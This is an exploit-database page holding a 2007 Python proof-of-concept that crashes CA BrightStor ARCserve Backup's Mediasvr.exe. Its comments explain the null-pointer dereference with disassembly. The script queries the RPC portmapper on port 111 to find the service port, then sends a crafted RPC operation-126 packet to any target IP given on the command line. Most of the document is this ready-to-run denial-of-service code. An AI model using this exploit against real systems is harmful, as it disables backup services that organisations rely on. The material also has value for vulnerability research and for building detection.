[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit

Author
Shirkdog
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6391
Category
dos / poc
Date add
15-05-2007
Platform
unsorted
====================================================================
CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit
====================================================================





#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)
# (Previously Unknown)
#
# There is an issue with RPC operation 126 and the imported cactirpc.dll 
# and rwxdr.dll. It looks as if Mediasvr.exe identifies a Bad Job Handle 
# as seen in its log file.
# 
# Log Message:
# asms_manager_job_enumerate_devices_1_svc(): Bad Job Handle.  
#
# However, the process dies when trying to send an RPC response 
# for the bad job handle. This is caused be a null memory dereference.
# Within cactirpc.dll, the xdr_rwpair function is called: 
#
# Catirpc.dll:2E008A93 loc_2E008A93:                          
# Catirpc.dll:2E008A93 mov     ecx, [esi+10h]
# Catirpc.dll:2E008A96 push    ecx	<- ECX is 0x0041B310 (nulls)
# Catirpc.dll:2E008A97 push    edi	<- EDI is 0x009e2580 (nulls)
# Catirpc.dll:2E008A98 call    dword ptr [esi+14h] <-points to 0x2d6054f0
# Catirpc.dll:2E008A9B add     esp, 8		    (rwxdr.dll:xdr_rwpair)
# Catirpc.dll:2E008A9E pop     edi
# Catirpc.dll:2E008A9F pop     esi
# Catirpc.dll:2E008AA0 pop     ebx
# Catirpc.dll:2E008AA1 retn
#
# rwxdr.dll:xdr_rwpair
# .text:2D6054F0 public xdr_rwpair
# .text:2D6054F0 xdr_rwpair proc near                    
# .text:2D6054F0    
# .text:2D6054F0 arg_0= dword ptr  4
# .text:2D6054F0 arg_4= dword ptr  8
# .text:2D6054F0
# .text:2D6054F0 push    ebx
# .text:2D6054F1 mov     ebx, [esp+4+arg_4] <---puts 0x0041B310
# .text:2D6054F5 push    esi
# .text:2D6054F6 push    edi
# .text:2D6054F7 mov     edi, [esp+0Ch+arg_0] <--- puts 0x009e2580
# .text:2D6054FB mov     esi, [ebx]	<---- EBX is 0x00000000
# .text:2D6054FD mov     eax, [edi]     <---- EDI is 0x00000000
# .text:2D6054FF test    eax, eax
# .text:2D605501 jnz     short loc_2D605533
# .text:2D605503 mov     eax, [esi+4]	<---- ESI is set to 0x00000000
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest 
# CA patches on Windows XP SP2 
#
# CA has been notified
#
# Author: M. Shirk
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com 
#
# Use at your own Risk: You have been warned 
#------------------------------------------------------------------------

import os
import sys
import time
import socket
import struct

#------------------------------------------------------------------------

#Start of RPC Packet
rpc_packet="\x80\x00\x00\x5c\x6b\x9b\x72\xbc\x00\x00\x00\x00\x00\x00\x00\x02"

#Program ID, and Operation 126
rpc_packet+="\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x7e"

#nulls after Operation
rpc_packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

#4 more bytes of junk (ALL HAIL BEEF)
rpc_packet+="\xde\xad\xbe\xef"

# Need to get the port Mediasvr.exe is listening on
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"

#------------------------------------------------------------------------

def ExploitMediaSvr(target,port):
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, port))
	sock.send(rpc_packet)
   	sock.close()
	print '[+] Done...\n[+] Mediasvr.exe is dead\n[+] ... or it will die in a few seconds for you inpatient bastards\n'


def GetMediaSvrPort(target):
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	sock.connect((target,111))
	sock.send(rpc_portmap_req)
	rec = sock.recv(256)

	port1 = rec[-4]
	port2 = rec[-3]
	port3 = rec[-2]
	port4 = rec[-1]	
	
	port1 = hex(ord(port1))
	port2 = hex(ord(port2))
	port3 = hex(ord(port3))
	port4 = hex(ord(port4))
	port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))
	
	port = int(port,16)
	
	print '[+] Sending TCP Packet of Death to Target: %s Port: %s' % (target,port)
	ExploitMediaSvr(target,port)
	



if __name__=="__main__":
       try:
               target = sys.argv[1]
       except IndexError:
           	print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
       		print '[+] Author: Shirkdog'
               	print '[+] Usage: %s <target ip>\n' % sys.argv[0]
               	sys.exit(-1)

       print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
       print '[+] Author: Shirkdog'

       GetMediaSvrPort(target)



#  0day.today [2024-12-24]  #